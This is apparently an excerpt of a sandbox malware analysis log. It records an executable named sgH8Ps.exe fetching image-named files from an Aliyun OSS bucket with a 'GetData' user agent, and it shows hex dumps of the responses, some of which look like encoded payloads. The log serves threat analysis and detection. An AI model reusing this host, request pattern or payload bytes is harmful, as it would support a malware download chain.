                                                  2025-01-02 11:15:20 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                  Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                  2025-01-02 11:15:20 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                  Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                  2025-01-02 11:15:20 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                  Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                  2025-01-02 11:15:20 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.649995118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:22 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:22 UTC548INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:22 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 4859125
                                                  Connection: close
                                                  x-oss-request-id: 6776754AA966993037DC0532
                                                  Accept-Ranges: bytes
                                                  ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                  Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 9060732723227198118
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                  x-oss-server-time: 11
                                                  2025-01-02 11:15:22 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                  Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                  Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                  Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                  2025-01-02 11:15:22 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                  Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                  Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                  Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                  2025-01-02 11:15:22 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                  Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                  2025-01-02 11:15:22 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                  Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                  2025-01-02 11:15:22 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                  Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.649996118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:35 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:36 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:35 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 5062442
                                                  Connection: close
                                                  x-oss-request-id: 677675577CF842343889E7A0
                                                  Accept-Ranges: bytes
                                                  ETag: "70C21DA900796B279A09040B00953E40"
                                                  Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 360383310743409046
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                  x-oss-server-time: 57
                                                  2025-01-02 11:15:36 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                  Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                  2025-01-02 11:15:36 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                  Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                  2025-01-02 11:15:36 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                  Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
